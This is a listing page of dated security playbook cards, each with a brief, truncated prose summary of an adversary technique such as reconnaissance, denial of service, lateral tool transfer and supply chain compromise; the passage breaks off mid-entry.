Playbook Battle Card

GSPBC-1082 – Reconnaissance – Gather Victim Network Information

2024-02-27T21:20:59+00:00

Gather Victim Network Information Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations. Adversaries may gather this information in various ways, such as direct collection actions via Active Scanning or Phishing for Information. Information about networks may also be exposed to adversaries via online ... Read More

GSPBC-1082 – Reconnaissance – Gather Victim Network Information2024-02-27T21:20:59+00:00
GSPBC-1081 - Impact - Endpoint Denial of Service

GSPBC-1081 – Impact – Endpoint Denial of Service

2024-02-15T22:48:17+00:00

Endpoint Denial of Service Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes and to support other malicious activities, including distraction, ... Read More

GSPBC-1081 – Impact – Endpoint Denial of Service2024-02-15T22:48:17+00:00

GSPBC-1080 Impact – Network Denial of Service

2024-01-31T22:45:59+00:00

Network Denial of Service Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes and to support other malicious activities, including distraction, hacktivism, and extortion. A Network DoS will occur ... Read More

GSPBC-1080 Impact – Network Denial of Service2024-01-31T22:45:59+00:00
GSPBC-1078 - Lateral Movement - Lateral Tool Transfer

GSPBC-1078 Lateral Movement – Lateral Tool Transfer

2024-01-11T22:50:34+00:00

Lateral Tool Transfer Adversaries may transfer tools or other files between systems in a compromised environment. Once brought into the victim environment (i.e., Ingress Tool Transfer) files may then be copied from one system to another to stage adversary tools or other files over the course of an operation. Adversaries may copy files between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over SMB/Windows Admin Shares to connected ... Read More

GSPBC-1078 Lateral Movement – Lateral Tool Transfer2024-01-11T22:50:34+00:00
GSPBC-1079 - Defense Evasion - XSL Script Processing

GSPBC-1079 Defense Evasion – XSL Script Processing

2024-01-11T22:45:08+00:00

XSL Script Processing Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. Adversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to Trusted Developer Utilities Proxy Execution, the Microsoft ... Read More

GSPBC-1079 Defense Evasion – XSL Script Processing2024-01-11T22:45:08+00:00
GSPBC-1076 - Discovery - Group Policy Discovery

GSPBC-1077 Persistence – Power Settings

2023-12-14T00:30:32+00:00

Power Settings Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity. Adversaries may abuse system utilities and configuration settings to maintain access by preventing machines from entering a state, such as standby, that can terminate malicious activity. For example, powercfg controls all ... Read More

GSPBC-1077 Persistence – Power Settings2023-12-14T00:30:32+00:00
GSPBC-1076 - Discovery - Group Policy Discovery

GSPBC-1076 Discovery – Group Policy Discovery

2023-11-15T02:52:25+00:00

Group Policy Discovery Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network ... Read More

GSPBC-1076 Discovery – Group Policy Discovery2023-11-15T02:52:25+00:00
GSPBC-1074 - Reconnaissance - Search Open Websites_Domains

GSPBC-1075 Initial Access – Supply Chain Compromise

2023-10-20T14:48:15+00:00

Supply Chain Compromise Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise can take place at any stage of the supply chain including: Manipulation of de